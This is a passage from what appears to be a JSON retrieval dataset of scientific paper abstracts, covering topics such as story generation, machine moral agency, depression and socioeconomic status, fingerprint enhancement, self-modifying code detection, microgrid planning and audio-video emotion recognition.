"text": "Creative computational systems have often been largescale endeavors, based on elaborate models of creativity and sometimes featuring an accumulation of heuristics and numerous subsystems. An argument is presented for facilitating the exploration of creativity through small-scale systems, which can be more transparent, reusable, focused, and easily generalized across domains and languages. These systems retain the ability, however, to model important aspects of aesthetic and creative processes. Examples of extremely simple story generators are presented along with their implications for larger-scale systems. A case study focuses on a system that implements the simplest possible model of ellipsis.",
"title": ""
},
{
"docid": "491ddda3cf5acf013b99cdb477acfc9e",
"text": "As we outsource more of our decisions and activities to machines with various degrees of autonomy, the question of clarifying the moral and legal status of their autonomous behaviour arises. There is also an ongoing discussion on whether artificial agents can ever be liable for their actions or become moral agents. Both in law and ethics, the concept of liability is tightly connected with the concept of ability. But as we work to develop moral machines, we also push the boundaries of existing categories of ethical competency and autonomy. This makes the question of responsibility particularly difficult. Although new classification schemes for ethical behaviour and autonomy have been discussed, these need to be worked out in far more detail. Here we address some issues with existing proposals, highlighting especially the link between ethical competency and autonomy, and the problem of anchoring classifications in an operational understanding of what we mean by a moral",
"title": ""
},
{
"docid": "94105f6e64a27b18f911d788145385b6",
"text": "Low socioeconomic status (SES) is generally associated with high psychiatric morbidity, more disability, and poorer access to health care. Among psychiatric disorders, depression exhibits a more controversial association with SES. The authors carried out a meta-analysis to evaluate the magnitude, shape, and modifiers of such an association. The search found 51 prevalence studies, five incidence studies, and four persistence studies meeting the criteria. A random effects model was applied to the odds ratio of the lowest SES group compared with the highest, and meta-regression was used to assess the dose-response relation and the influence of covariates. Results indicated that low-SES individuals had higher odds of being depressed (odds ratio = 1.81, p < 0.001), but the odds of a new episode (odds ratio = 1.24, p = 0.004) were lower than the odds of persisting depression (odds ratio = 2.06, p < 0.001). A dose-response relation was observed for education and income. Socioeconomic inequality in depression is heterogeneous and varies according to the way psychiatric disorder is measured, to the definition and measurement of SES, and to contextual features such as region and time. Nonetheless, the authors found compelling evidence for socioeconomic inequality in depression. Strategies for tackling inequality in depression are needed, especially in relation to the course of the disorder.",
"title": ""
},
{
"docid": "f393b6e00ef1e97f683a5dace33e40ff",
"text": "s on human factors in computing systems (pp. 815–828). ACM New York, NY, USA. Hudlicka, E. (1997). Summary of knowledge elicitation techniques for requirements analysis (Course material for human computer interaction). Worcester Polytechnic Institute. Kaptelinin, V., & Nardi, B. (2012). Affordances in HCI: Toward a mediated action perspective. In Proceedings of CHI '12 (pp. 967–976).",
"title": ""
},
{
"docid": "fc3b087bd2c0bd4e12f3cb86f6346c96",
"text": "This study investigated whether changes in the technological/social environment in the United States over time have resulted in concomitant changes in the multitasking skills of younger generations. One thousand, three hundred and nineteen Americans from three generations were queried to determine their at-home multitasking behaviors. An anonymous online questionnaire asked respondents to indicate which everyday and technology-based tasks they choose to combine for multitasking and to indicate how difficult it is to multitask when combining the tasks. Combining tasks occurred frequently, especially while listening to music or eating. Members of the ‘‘Net Generation” reported more multitasking than members of ‘‘Generation X,” who reported more multitasking than members of the ‘‘Baby Boomer” generation. The choices of which tasks to combine for multitasking were highly correlated across generations, as were difficulty ratings of specific multitasking combinations. The results are consistent with a greater amount of general multitasking resources in younger generations, but similar mental limitations in the types of tasks that can be multitasked. 2008 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "e3853e259c3ae6739dcae3143e2074a8",
"text": "A new reference collection of patent documents for training and testing automated categorization systems is established and described in detail. This collection is tailored for automating the attribution of international patent classification codes to patent applications and is made publicly available for future research work. We report the results of applying a variety of machine learning algorithms to the automated categorization of English-language patent documents. This procedure involves a complex hierarchical taxonomy, within which we classify documents into 114 classes and 451 subclasses. Several measures of categorization success are described and evaluated. We investigate how best to resolve the training problems related to the attribution of multiple classification codes to each patent document.",
"title": ""
},
{
"docid": "5dee244ee673909c3ba3d3d174a7bf83",
"text": "Fingerprint has remained a very vital index for human recognition. In the field of security, series of Automatic Fingerprint Identification Systems (AFIS) have been developed. One of the indices for evaluating the contributions of these systems to the enforcement of security is the degree with which they appropriately verify or identify input fingerprints. This degree is generally determined by the quality of the fingerprint images and the efficiency of the algorithm. In this paper, some of the sub-models of an existing mathematical algorithm for the fingerprint image enhancement were modified to obtain new and improved versions. The new versions consist of different mathematical models for fingerprint image segmentation, normalization, ridge orientation estimation, ridge frequency estimation, Gabor filtering, binarization and thinning. The implementation was carried out in an environment characterized by Window Vista Home Basic operating system as platform and Matrix Laboratory (MatLab) as frontend engine. Synthetic images as well as real fingerprints obtained from the FVC2004 fingerprint database DB3 set A were used to test the adequacy of the modified sub-models and the resulting algorithm. The results show that the modified sub-models perform well with significant improvement over the original versions. The results also show the necessity of each level of the enhancement. KeywordAFIS; Pattern recognition; pattern matching; fingerprint; minutiae; image enhancement.",
"title": ""
},
{
"docid": "e2b166491ccc69674d2a597282facf02",
"text": "With the advancement of radio access networks, more and more mobile data content needs to be transported by optical networks. Mobile fronthaul is an important network segment that connects centralized baseband units (BBUs) with remote radio units in cloud radio access networks (C-RANs). It enables advanced wireless technologies such as coordinated multipoint and massive multiple-input multiple-output. Mobile backhaul, on the other hand, connects BBUs with core networks to transport the baseband data streams to their respective destinations. Optical access networks are well positioned to meet the first optical communication demands of C-RANs. To better address the stringent requirements of future generations of wireless networks, such as the fifth-generation (5G) wireless, optical access networks need to be improved and enhanced. In this paper, we review emerging optical access network technologies that aim to support 5G wireless with high capacity, low latency, and low cost and power per bit. Advances in high-capacity passive optical networks (PONs), such as 100 Gbit/s PON, will be reviewed. Among the topics discussed are advanced modulation and detection techniques, digital signal processing tailored for optical access networks, and efficient mobile fronthaul techniques. We also discuss the need for coordination between RAN and PON to simplify the overall network, reduce the network latency, and improve the network cost efficiency and power efficiency.",
"title": ""
},
{
"docid": "63f0ff6663f334e1ab05d0ce5d2239cf",
"text": "Railroad tracks need to be periodically inspected and monitored to ensure safe transportation. Automated track inspection using computer vision and pattern recognition methods has recently shown the potential to improve safety by allowing for more frequent inspections while reducing human errors. Achieving full automation is still very challenging due to the number of different possible failure modes, as well as the broad range of image variations that can potentially trigger false alarms. In addition, the number of defective components is very small, so not many training examples are available for the machine to learn a robust anomaly detector. In this paper, we show that detection performance can be improved by combining multiple detectors within a multitask learning framework. We show that this approach results in improved accuracy for detecting defects on railway ties and fasteners.",
"title": ""
},
{
"docid": "8ed61e6caf9864805fb6017aa5c35600",
"text": "Self-modifying code (SMC) is widely used in obfuscated program for enhancing the difficulty in reverse engineering. The typical mode of self-modifying code is restore-execute-hide, it drives program to conceal real behaviors at most of the time, and only under actual running will the real code be restored and executed. In order to locate the SMC and further recover the original logic of code for guiding program analysis, dynamic self-modifying code detecting method based on backward analysis is proposed. Our method first extracts execution trace such as instructions and status through dynamic analysis. Then we maintain a memory set to store the memory address of execution instructions, the memory set will update dynamically while backward searching the trace, and simultaneously will we check the memory write address to match with current memory set in order to identify the mode \"modify then execute\". By means of validating self-modifying code which is identified via above procedures, we can easily deobfuscate the program which use self-modifying code and achieve its original logic. A prototype that can be applied in self-modifying code detection is designed and implemented. The evaluation results show our method can trace the execution of program effectively, and can reduce the consumption in time and space.",
"title": ""
},
{
"docid": "a9907a05542c0a419ad4dcd3fdb7132b",
"text": "In this paper we develop an adaptive dual free Stochastic Dual Coordinate Ascent (adfSDCA) algorithm for regularized empirical risk minimization problems. This is motivated by the recent work on dual free SDCA of Shalev-Shwartz (2016). The novelty of our approach is that the coordinates to update at each iteration are selected non-uniformly from an adaptive probability distribution, and this extends the previously mentioned work which only allowed for a uniform selection of “dual” coordinates from a fixed probability distribution. We describe an efficient iterative procedure for generating the non-uniform samples, where the scheme selects the coordinate with the greatest potential to decrease the sub-optimality of the current iterate. We also propose a heuristic variant of adfSDCA that is more aggressive than the standard approach. Furthermore, in order to utilize multi-core machines we consider a mini-batch adfSDCA algorithm and develop complexity results that guarantee the algorithm’s convergence. The work is concluded with several numerical experiments to demonstrate the practical benefits of the proposed approach.",
"title": ""
},
{
"docid": "36f2470ce215647bf92cbb9d8316c51c",
"text": "BACKGROUND\nIn schizophrenia and major depressive disorder, anhedonia (a loss of capacity to feel pleasure) had differently been considered as a premorbid personological trait or as a main symptom of their clinical picture. The aims of this study were to examine the pathological features of anhedonia in schizophrenic and depressed patients, and to investigate its clinical relations with general psychopathology (negative, positive, and depressive dimensions).\n\n\nMETHODS\nA total of 145 patients (80 schizophrenics and 65 depressed subjects) were assessed using the Physical Anhedonia Scale and the Social Anhedonia Scale (PAS and SAS, respectively), the Scales for the Assessment of Positive and Negative Symptoms (SAPS and SANS, respectively), the Calgary Depression Scale for Schizophrenics (CDSS), and the Hamilton Depression Rating Scale (HDRS). The statistical analysis was performed in two steps. First, the schizophrenic and depressed samples were dichotomised into 'anhedonic' and 'normal hedonic' subgroups (according to the 'double (PAS/SAS) cut-off') and were compared on the general psychopathology scores using the Mann-Whitney Z test. Subsequently, for the total schizophrenic and depressed samples, Spearman correlations were calculated to examine the relation between anhedonia ratings and the other psychopathological parameters.\n\n\nRESULTS\nIn the schizophrenic sample, anhedonia reached high significant levels only in 45% of patients (n = 36). This 'anhedonic' subgroup was distinguished by high scores in the disorganisation and negative dimensions. Positive correlations of anhedonia with disorganised and negative symptoms were also been detected. In the depressed sample, anhedonia reached high significant levels in only 36.9% of subjects (n = 24). This 'anhedonic' subgroup as distinguished by high scores in the depression severity and negative dimensions. Positive correlations of anhedonia with depressive and negative symptoms were also been detected.\n\n\nCONCLUSION\nIn the schizophrenic sample, anhedonia seems to be a specific subjective psychopathological experience of the negative and disorganised forms of schizophrenia. In the depressed sample, anhedonia seems to be a specific subjective psychopathological experience of those major depressive disorder forms with a marked clinical depression severity.",
"title": ""
},
{
"docid": "6f89545413126005fe475b56798a3b86",
"text": "Sustainable electrification planning for remote locations especially in developing countries is very complex in nature while considering different traits such as social, economic, technical, and environmental. To address these issues related to current energy needs depending upon the end user requirements, a coherent, translucent, efficient, and rational energy planning framework has to be identified. This paper presents a comprehensive generalized methodological framework based on the synergies of decision analysis and optimization models for the design of a reliable, robust, and economic microgrid system based on locally available resources for rural communities in developing nations. The framework consists of three different stages. First, decision analysis considering various criterions (technical, social, economic, and environmental) for the selection of suitable energy alternative for designing the microgrid considering multiple scenarios are carried out. Second, the optimal sizing of the various energy resources in different microgrid structures is illustrated. Third, hybrid decision analysis methods are used for selection of the best sustainable microgrid energy system. Finally, the framework presented is then utilized for the design of a sustainable rural microgrid for a remote community located in the Himalayas in India to illustrate its effectiveness. The results obtained show that decision analysis tools provide a real-time solution for rural electrification by binding the synergy between various criteria considering different scenarios. The feasibility analysis using proposed multiyear scalable approach shows its competence not only in determining the suitable size of the microgrid, but also by reducing the net present cost and the cost of electricity significantly.",
"title": ""
},
{
"docid": "8693b7f3e4f4071ab9490f824630285c",
"text": "The difficulty of emotion recognition in the wild (EmotiW) is how to train a robust model to deal with diverse scenarios and anomalies. The Audio-video Sub-challenge in EmotiW contains audio-video short clips with several emotional labels and the task is to distinguish which label the video belongs to. For the better emotion recognition in videos, we propose a multiple spatio-temporal feature fusion (MSFF) framework, which can more accurately depict emotional information in spatial and temporal dimensions by two mutually complementary sources, including the facial image and audio. The framework is consisted of two parts: the facial image model and the audio model. With respect to the facial image model, three different architectures of spatial-temporal neural networks are employed to extract discriminative features about different emotions in facial expression images. Firstly, the high-level spatial features are obtained by the pre-trained convolutional neural networks (CNN), including VGG-Face and ResNet-50 which are all fed with the images generated by each video. Then, the features of all frames are sequentially input to the Bi-directional Long Short-Term Memory (BLSTM) so as to capture dynamic variations of facial appearance textures in a video. In addition to the structure of CNN-RNN, another spatio-temporal network, namely deep 3-Dimensional Convolutional Neural Networks (3D CNN) by extending the 2D convolution kernel to 3D, is also applied to attain evolving emotional information encoded in multiple adjacent frames. For the audio model, the spectrogram images of speech generated by preprocessing audio, are also modeled in a VGG-BLSTM framework to characterize the affective fluctuation more efficiently. Finally, a fusion strategy with the score matrices of different spatio-temporal networks gained from the above framework is proposed to boost the performance of emotion recognition complementally. Extensive experiments show that the overall accuracy of our proposed MSFF is 60.64%, which achieves a large improvement compared with the baseline and outperform the result of champion team in 2017.",
"title": ""
}
] | scidocsrr |
8241a37781dba5ef020939ffeabcf0a2 | Regional Grey Matter Structure Differences between Transsexuals and Healthy Controls—A Voxel Based Morphometry Study | [
{
"docid": "6d45e9d4d1f46debcbf1b95429be60fd",
"text": "Sex differences in cortical thickness (CTh) have been extensively investigated but as yet there are no reports on CTh in transsexuals. Our aim was to determine whether the CTh pattern in transsexuals before hormonal treatment follows their biological sex or their gender identity. We performed brain magnetic resonance imaging on 94 subjects: 24 untreated female-to-male transsexuals (FtMs), 18 untreated male-to-female transsexuals (MtFs), and 29 male and 23 female controls in a 3-T TIM-TRIO Siemens scanner. T1-weighted images were analyzed to obtain CTh and volumetric subcortical measurements with FreeSurfer software. CTh maps showed control females have thicker cortex than control males in the frontal and parietal regions. In contrast, males have greater right putamen volume. FtMs had a similar CTh to control females and greater CTh than males in the parietal and temporal cortices. FtMs had larger right putamen than females but did not differ from males. MtFs did not differ in CTh from female controls but had greater CTh than control males in the orbitofrontal, insular, and medial occipital regions. In conclusion, FtMs showed evidence of subcortical gray matter masculinization, while MtFs showed evidence of CTh feminization. In both types of transsexuals, the differences with respect to their biological sex are located in the right hemisphere.",
"title": ""
}
] | [
{
"docid": "2ff290ba8bab0de760c289bff3feee06",
"text": "Bayesian Networks are being used extensively for reasoning under uncertainty. Inference mechanisms for Bayesian Networks are compromised by the fact that they can only deal with propositional domains. In this work, we introduce an extension of that formalism, Hierarchical Bayesian Networks, that can represent additional information about the structure of the domains of variables. Hierarchical Bayesian Networks are similar to Bayesian Networks, in that they represent probabilistic dependencies between variables as a directed acyclic graph, where each node of the graph corresponds to a random variable and is quanti ed by the conditional probability of that variable given the values of its parents in the graph. What extends the expressive power of Hierarchical Bayesian Networks is that a node may correspond to an aggregation of simpler types. A component of one node may itself represent a composite structure; this allows the representation of complex hierarchical domains. Furthermore, probabilistic dependencies can be expressed at any level, between nodes that are contained in the same structure.",
"title": ""
},
{
"docid": "b2ebad4a19cdfce87e6b69a25ba6ab49",
"text": "Collaborative filtering have become increasingly important with the development of Web 2.0. Online shopping service providers aim to provide users with quality list of recommended items that will enhance user satisfaction and loyalty. Matrix factorization approaches have become the dominant method as they can reduce the dimension of the data set and alleviate the sparsity problem. However, matrix factorization approaches are limited because they depict each user as one preference vector. In practice, we observe that users may have different preferences when purchasing different subsets of items, and the periods between purchases also vary from one user to another. In this work, we propose a probabilistic approach to learn latent clusters in the large user-item matrix, and incorporate temporal information into the recommendation process. Experimental results on a real world dataset demonstrate that our approach significantly improves the conversion rate, precision and recall of state-of-the-art methods.",
"title": ""
},
{
"docid": "3e442c589eb4b2501b6ed2a8f1774e73",
"text": "Today, sensors are increasingly used for data collection. In the medical domain, for example, vital signs (e.g., pulse or oxygen saturation) of patients can be measured with sensors and used for further processing. In this paper, different types of applications will be discussed whether sensors might be used in the context of these applications and their suitability for applying external sensors to them. Furthermore, a system architecture for adding sensor technology to respective applications is presented. For this purpose, a real-world business application scenario in the field of well-being and fitness is presented. In particular, we integrated two different sensors in our fitness application. We report on the lessons learned from the implementation and use of this application, e.g., in respect to connection and data structure. They mainly deal with problems relating to the connection and communication between the smart mobile device and the external sensors, as well as the selection of the appropriate type of application. Finally, a robust sensor framework, arising from this fitness application is presented. This framework provides basic features for connecting sensors. Particularly, in the medical domain, it is crucial to provide an easy to use toolset to relieve medical staff.",
"title": ""
},
{
"docid": "0c28741df3a9bf999f4abe7b840cfb26",
"text": "In this work, we analyze taxi-GPS traces collected in Lisbon, Portugal. We perform an exploratory analysis to visualize the spatiotemporal variation of taxi services; explore the relationships between pick-up and drop-off locations; and analyze the behavior in downtime (between the previous drop-off and the following pick-up). We also carry out the analysis of predictability of taxi trips for the next pick-up area type given history of taxi flow in time and space.",
"title": ""
},
{
"docid": "e8459c80dc392cac844b127bc5994a5d",
"text": "Database security has become a vital issue in modern Web applications. Critical business data in databases is an evident target for attack. Therefore, ensuring the confidentiality, privacy and integrity of data is a major issue for the security of database systems. Recent high profile data thefts have shown that perimeter defenses are insufficient to secure sensitive data. This paper studies security of the databases shared between many parties from a cryptographic perspective. We propose Mixed Cryptography Database (MCDB), a novel framework to encrypt databases over untrusted networks in a mixed form using many keys owned by different parties. The encryption process is based on a new data classification according to the data owner. The proposed framework is very useful in strengthening the protection of sensitive data even if the database server is attacked at multiple points from the inside or outside.",
"title": ""
},
{
"docid": "c1c241d9275e154a3fc2ca41a22b2c43",
"text": "Population counts and longitude and latitude coordinates were estimated for the 50 largest cities in the United States by computational linguistic techniques and by human participants. The mathematical technique Latent Semantic Analysis applied to newspaper texts produced similarity ratings between the 50 cities that allowed for a multidimensional scaling (MDS) of these cities. MDS coordinates correlated with the actual longitude and latitude of these cities, showing that cities that are located together share similar semantic contexts. This finding was replicated using a first-order co-occurrence algorithm. The computational estimates of geographical location as well as population were akin to human estimates. These findings show that language encodes geographical information that language users in turn may use in their understanding of language and the world.",
"title": ""
},
{
"docid": "0e56ef5556c34274de7d7dceff17317e",
"text": "We investigate grounded sentence representations, where we train a sentence encoder to predict the image features of a given caption— i.e., we try to “imagine” how a sentence would be depicted visually—and use the resultant features as sentence representations. We examine the quality of the learned representations on a variety of standard sentence representation quality benchmarks, showing improved performance for groundedmodels over non-grounded ones. In addition, we thoroughly analyze the extent to which grounding contributes to improved performance, and show that the system also learns improved word embeddings.",
"title": ""
},
{
"docid": "4bab29f0689f301683370e73fa045bcc",
"text": "Over the past decade, the traditional purchasing and logistics functions have evolved into a broader strategic approach to materials and distribution management known as supply chain management. This research reviews the literature base and development of supply chain management from two separate paths that eventually merged into the modern era of a holistic and strategic approach to operations, materials and logistics management. In addition, this article attempts to clearly describe supply chain management since the literature is replete with buzzwords that address elements or stages of this new management philosophy. This article also discusses various supply chain management strategies and the conditions conducive to supply chain management. ( 2000 Elsevier Science Ltd. All rights reserved.",
"title": ""
},
{
"docid": "a036dd162a23c5d24125d3270e22aaf7",
"text": "1 Problem Description This work is focused on the relationship between the news articles (breaking news) and stock prices. The student will design and develop methods to analyze how and when the news articles influence the stock market. News articles about Norwegian oil related companies and stock prices from \" BW Offshore Limited \" (BWO), \" DNO International \" (DNO), \" Frontline \" (FRO), \" Petroleum Geo-Services \" (PGS), \" Seadrill \" (SDRL), \" Sevan Marine \" (SEVAN), \" Siem Offshore \" (SIOFF), \" Statoil \" (STL) and \" TGS-NOPEC Geophysical Company \" (TGS) will be crawled, preprocessed and the important features in the text will be extracted to effectively represent the news in a form that allows the application of computational techniques. This data will then be used to train text sense classifiers. A prototype system that employs such classifiers will be developed to support the trader in taking sell/buy decisions. Methods will be developed for automaticall sense-labeling of news that are informed by the correlation between the changes in the stock prices and the breaking news. Performance of the prototype decision support system will be compared with a chosen baseline method for trade-related decision making. Abstract This thesis investigates the prediction of possible stock price changes immediately after news article publications. This is done by automatic analysis of these news articles. Some background information about financial trading theory and text mining is given in addition to an overview of earlier related research in the field of automatic news article analyzes with the purpose of predicting future stock prices. In this thesis a system is designed and implemented to predict stock price trends for the time immediately after the publication of news articles. This system consists mainly of four components. The first component gathers news articles and stock prices automatically from internet. The second component prepares the news articles by sending them to some document preprocessing steps and finding relevant features before they are sent to a document representation process. The third component categorizes the news articles into predefined categories, and finally the fourth component applies appropriate trading strategies depending on the category of the news article. This system requires a labeled data set to train the categorization component. This data set is labeled automatically on the basis of the price trends directly after the news article publication. An additional label refining step using clustering is added in an …",
"title": ""
},
{
"docid": "bd039cbb3b9640e917b9cc15e45e5536",
"text": "We introduce adversarial neural networks for representation learning as a novel approach to transfer learning in brain-computer interfaces (BCIs). The proposed approach aims to learn subject-invariant representations by simultaneously training a conditional variational autoencoder (cVAE) and an adversarial network. We use shallow convolutional architectures to realize the cVAE, and the learned encoder is transferred to extract subject-invariant features from unseen BCI users’ data for decoding. We demonstrate a proof-of-concept of our approach based on analyses of electroencephalographic (EEG) data recorded during a motor imagery BCI experiment.",
"title": ""
},
{
"docid": "9e10ca5f3776df0fe0ca41a8046adb27",
"text": "The availability of smartphone and wearable sensor technology is leading to a rapid accumulation of human subject data, and machine learning is emerging as a technique to map that data into clinical predictions. As machine learning algorithms are increasingly used to support clinical decision making, it is important to reliably quantify their prediction accuracy. Cross-validation is the standard approach for evaluating the accuracy of such algorithms; however, several cross-validations methods exist and only some of them are statistically meaningful. Here we compared two popular cross-validation methods: record-wise and subject-wise. Using both a publicly available dataset and a simulation, we found that record-wise cross-validation often massively overestimates the prediction accuracy of the algorithms. We also found that this erroneous method is used by almost half of the retrieved studies that used accelerometers, wearable sensors, or smartphones to predict clinical outcomes. As we move towards an era of machine learning based diagnosis and treatment, using proper methods to evaluate their accuracy is crucial, as erroneous results can mislead both clinicians and data scientists.",
"title": ""
},
{
"docid": "dd5e9984bbafb6b6aa8030e9a47c6230",
"text": "The variational Bayesian (VB) approximation is known to be a promising approach to Bayesian estimation, when the rigorous calculation of the Bayes posterior is intractable. The VB approximation has been successfully applied to matrix factorization (MF), offering automatic dimensionality selection for principal component analysis. Generally, finding the VB solution is a non-convex problem, and most methods rely on a local search algorithm derived through a standard procedure for the VB approximation. In this paper, we show that a better option is available for fully-observed VBMF—the global solution can be analytically computed. More specifically, the global solution is a reweighted SVD of the observed matrix, and each weight can be obtained by solving a quartic equation with its coefficients being functions of the observed singular value. We further show that the global optimal solution of empirical VBMF (where hyperparameters are also learned from data) can also be analytically computed. We illustrate the usefulness of our results through experiments in multi-variate analysis.",
"title": ""
},
{
"docid": "4b9d994288fc555c89554cc2c7e41712",
"text": "The authors have been developing humanoid robots in order to develop new mechanisms and functions for a humanoid robot that has the ability to communicate naturally with a human by expressing human-like emotion. In 2004, we developed the emotion expression humanoid robot WE-4RII (Waseda Eye No.4 Refined II) by integrating the new humanoid robot hands RCH-I (RoboCasa Hand No.1) into the emotion expression humanoid robot WE-4R. We confirmed that WE-4RII can effectively express its emotion.",
"title": ""
},
{
"docid": "c7cfc79579704027bf28fc7197496b8c",
"text": "There is a growing trend nowadays for patients to seek the least invasive treatments possible with less risk of complications and downtime to correct rhytides and ptosis characteristic of aging. Nonsurgical face and neck rejuvenation has been attempted with various types of interventions. Suture suspension of the face, although not a new idea, has gained prominence with the advent of the so called \"lunch-time\" face-lift. Although some have embraced this technique, many more express doubts about its safety and efficacy limiting its widespread adoption. The present review aims to evaluate several clinical parameters pertaining to thread suspensions such as longevity of results of various types of polypropylene barbed sutures, their clinical efficacy and safety, and the risk of serious adverse events associated with such sutures. Early results of barbed suture suspension remain inconclusive. Adverse events do occur though mostly minor, self-limited, and of short duration. Less clear are the data on the extent of the peak correction and the longevity of effect, and the long-term effects of the sutures themselves. The popularity of barbed suture lifting has waned for the time being. Certainly, it should not be presented as an alternative to a face-lift.",
"title": ""
},
{
"docid": "72600a23cc70d9cc3641cbfc7f23ba4d",
"text": "Primary cicatricial alopecias (PCAs) are a rare, but important, group of disorders that cause irreversible damage to hair follicles resulting in scarring and permanent hair loss. They may also signify an underlying systemic disease. Thus, it is of paramount importance that clinicians who manage patients with hair loss are able to diagnose these disorders accurately. Unfortunately, PCAs are notoriously difficult conditions to diagnose and treat. The aim of this review is to present a rational and pragmatic guide to help clinicians in the professional assessment, investigation and diagnosis of patients with PCA. Illustrating typical clinical and histopathological presentations of key PCA entities we show how dermatoscopy can be profitably used for clinical diagnosis. Further, we advocate the search for loss of follicular ostia as a clinical hallmark of PCA, and suggest pragmatic strategies that allow rapid formulation of a working diagnosis.",
"title": ""
},
{
"docid": "bcbbc8913330378af7c986549ab4bb30",
"text": "Anomaly detection involves identifying the events which do not conform to an expected pattern in data. A common approach to anomaly detection is to identify outliers in a latent space learned from data. For instance, PCA has been successfully used for anomaly detection. Variational autoencoder (VAE) is a recently-developed deep generative model which has established itself as a powerful method for learning representation from data in a nonlinear way. However, the VAE does not take the temporal dependence in data into account, so it limits its applicability to time series. In this paper we combine the echo-state network, which is a simple training method for recurrent networks, with the VAE, in order to learn representation from multivariate time series data. We present an echo-state conditional variational autoencoder (ES-CVAE) and demonstrate its useful behavior in the task of anomaly detection in multivariate time series data.",
"title": ""
},
{
"docid": "4ecd27822fee036150b1c8f3db70c679",
"text": "Despite the proliferation of e-services, they are still characterized by uncertainties. As result, consumer trust beliefs are considered an important determinant of e-service adoption. Past work has not however considered the potentially dynamic nature of these trust beliefs, and how early-stage trust might influence later-stage adoption and use. To address this gap, this study draws on the theory of reasoned action and expectation-confirmation theory to carry out a longitudinal study of trust in eservices. Specifically, we examine how trust interacts with other consumer beliefs, such as perceived usefulness, and how together these beliefs influence consumer intentions and actual behaviours toward e-services at both initial and later stages of use. The empirical context is online health information services. Data collection was carried out at two time periods, approximately 7 weeks apart using a student population. The results show that perceived usefulness and trust are important at both initial and later stages in consumer acceptance of online health services. Consumers’ actual usage experiences modify perceptions of usefulness and influence the confirmation of their initial expectations. These results have implications for our understanding of the dynamic nature of trust and perceived usefulness, and their roles in long term success of e-services.",
"title": ""
},
{
"docid": "4c4a28724bf847de8e57765f869c4f3f",
"text": "Emotional sensitivity, emotion regulation and impulsivity are fundamental topics in research of borderline personality disorder (BPD). Studies using fMRI examining the neural correlates concerning these topics is growing and has just begun understanding the underlying neural correlates in BPD. However, there are strong similarities but also important differences in results of different studies. It is therefore important to know in more detail what these differences are and how we should interpret these. In present review a critical light is shed on the fMRI studies examining emotional sensitivity, emotion regulation and impulsivity in BPD patients. First an outline of the methodology and the results of the studies will be given. Thereafter important issues that remained unanswered and topics to improve future research are discussed. Future research should take into account the limited power of previous studies and focus more on BPD specificity with regard to time course responses, different regulation strategies, manipulation of self-regulation, medication use, a wider range of stimuli, gender effects and the inclusion of a clinical control group.",
"title": ""
},
{
"docid": "9f52ee95148490555c10f699678b640d",
"text": "Prior research indicates that Facebook usage predicts declines in subjective well-being over time. How does this come about? We examined this issue in 2 studies using experimental and field methods. In Study 1, cueing people in the laboratory to use Facebook passively (rather than actively) led to declines in affective well-being over time. Study 2 replicated these findings in the field using experience-sampling techniques. It also demonstrated how passive Facebook usage leads to declines in affective well-being: by increasing envy. Critically, the relationship between passive Facebook usage and changes in affective well-being remained significant when controlling for active Facebook use, non-Facebook online social network usage, and direct social interactions, highlighting the specificity of this result. These findings demonstrate that passive Facebook usage undermines affective well-being.",
"title": ""
},
{
"docid": "a64ae2e6e72b9e38c700ddd62b4f6bf3",
"text": "Cerebral gray-matter volume (GMV) decreases in normal aging but the extent of the decrease may be experience-dependent. Bilingualism may be one protective factor and in this article we examine its potential protective effect on GMV in a region that shows strong age-related decreases-the left anterior temporal pole. This region is held to function as a conceptual hub and might be expected to be a target of plastic changes in bilingual speakers because of the requirement for these speakers to store and differentiate lexical concepts in 2 languages to guide speech production and comprehension processes. In a whole brain comparison of bilingual speakers (n = 23) and monolingual speakers (n = 23), regressing out confounding factors, we find more extensive age-related decreases in GMV in the monolingual brain and significantly increased GMV in left temporal pole for bilingual speakers. Consistent with a specific neuroprotective effect of bilingualism, region of interest analyses showed a significant positive correlation between naming performance in the second language and GMV in this region. The effect appears to be bilateral though because there was a nonsignificantly different effect of naming performance on GMV in the right temporal pole. Our data emphasize the vulnerability of the temporal pole to normal aging and the value of bilingualism as both a general and specific protective factor to GMV decreases in healthy aging.",
"title": ""
}
] | scidocsrr |
82199b11d2d9b2dba4dd628ee36af561 | Views: A Way for Pattern Matching to Cohabit with Data Abstraction | [
{
"docid": "7c8f667a1a1d683de699f6523efadd28",
"text": "Introduction Pattern matching is a very powerful and useful device in programming. In functional languages it emerged in SASL [Turn76] and Hope [BursS0], and has also found its way into SML [Miln84]. The pattern mathing described here is that of LML which is a lazy ([Frie76] and [Henri76]) variant of ML. The pattern matching in LML evolved independently of that in SML so they are not (yet) the same, although very similar. The compilation of pattern matching in SML has been addressed in [Card84]. The LML compiler project began as an attempt to produce efficient code for a typed functional language with lazy evaluation. Since we regard pattern matching as an important language feature it should also yield efficient code. Only pattern matching in case expressions is described here, since we regard this as the basic pattern matching facility in the language. All other types of pattern mathing used in LML can be easily translated into case expressions, see [Augu84] for details. The compilation (of pattern matching) proceeds in several steps: • transform all pattern matching to case expressions. • transform complex case expressions into expressions that are easy to generate code for. • generate G-code for the case expressions, and from that machine code for the target machine.",
"title": ""
}
] | [
{
"docid": "376943ca96470be14dd8ee821a59e0ee",
"text": "Interoperability in the Internet of Things is critical for emerging services and applications. In this paper we advocate the use of IoT `hubs' to aggregate things using web protocols, and suggest a staged approach to interoperability. In the context of a UK government funded project involving 8 IoT sub-projects to address cross-domain IoT interoperability, we introduce the HyperCat IoT catalogue specification. We then describe the tools and techniques we developed to adapt an existing data portal and IoT platform to this specification, and provide an IoT hub focused on the highways industry called `Smart Streets'. Based on our experience developing this large scale IoT hub, we outline lessons learned which we hope will contribute to ongoing efforts to create an interoperable global IoT ecosystem.",
"title": ""
},
{
"docid": "04013595912b4176574fb81b38beade5",
"text": "This chapter presents an overview of the current state of cognitive task analysis (CTA) in research and practice. CTA uses a variety of interview and observation strategies to capture a description of the explicit and implicit knowledge that experts use to perform complex tasks. The captured knowledge is most often transferred to training or the development of expert systems. The first section presents descriptions of a variety of CTA techniques, their common characteristics, and the typical strategies used to elicit knowledge from experts and other sources. The second section describes research on the impact of CTA and synthesizes a number of studies and reviews pertinent to issues underlying knowledge elicitation. In the third section, we discuss the integration of CTA with training design. Finally, in the fourth section, we present a number of recommendations for future research and conclude with general comments.",
"title": ""
},
{
"docid": "7f43ad2fd344aa7260e3af33d3f69e32",
